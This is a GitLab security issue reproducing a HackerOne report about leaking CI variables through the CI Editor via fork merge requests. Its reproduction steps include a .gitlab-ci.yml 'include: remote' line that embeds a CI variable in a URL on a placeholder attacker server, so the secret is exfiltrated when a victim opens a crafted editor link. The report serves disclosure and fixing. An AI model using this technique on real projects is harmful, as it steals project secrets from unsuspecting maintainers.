Backend: Leaking CI variables by visiting the CI Editor via fork MRs
⚠ Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.
HackerOne report #1890451 by shells3c
on 2023-03-02, assigned to GitLab Team
:
Report
SSOT
Refer to #417275 (closed)
Summary
By clicking on a link, project members can leak CI variables of their project to hackers
Steps to reproduce
- [Victim account] Create a project, create a CI variable in General > CI/CD > Variables named
xxx_variable
- [Attacker account] Fork the project, and edit the CI configuration (
.gitlab-ci.yml
by default) with the following content (replace<ATTACKER SERVER>
with your server):
include:
remote: 'http://<ATTACKER SERVER>/${xxx_variable}.yaml'
- [Attacker account] Create a merge request with the previous change, save the commit SHA
- [Victim account] Visit this link (with
<sha>
replaced) and the variable will be sent to the attacker server:https://gitlab.com/<user>/<project>/-/ci/editor?branch_name=<sha>
Output of checks
This bug happens on GitLab.com
Impact
Steal CI variables by one click
How To Reproduce
Please add reproducibility information to this section:
Proposal
Please read this thread: #394964 (comment 1416011415)
Edited by Mark Nuzzo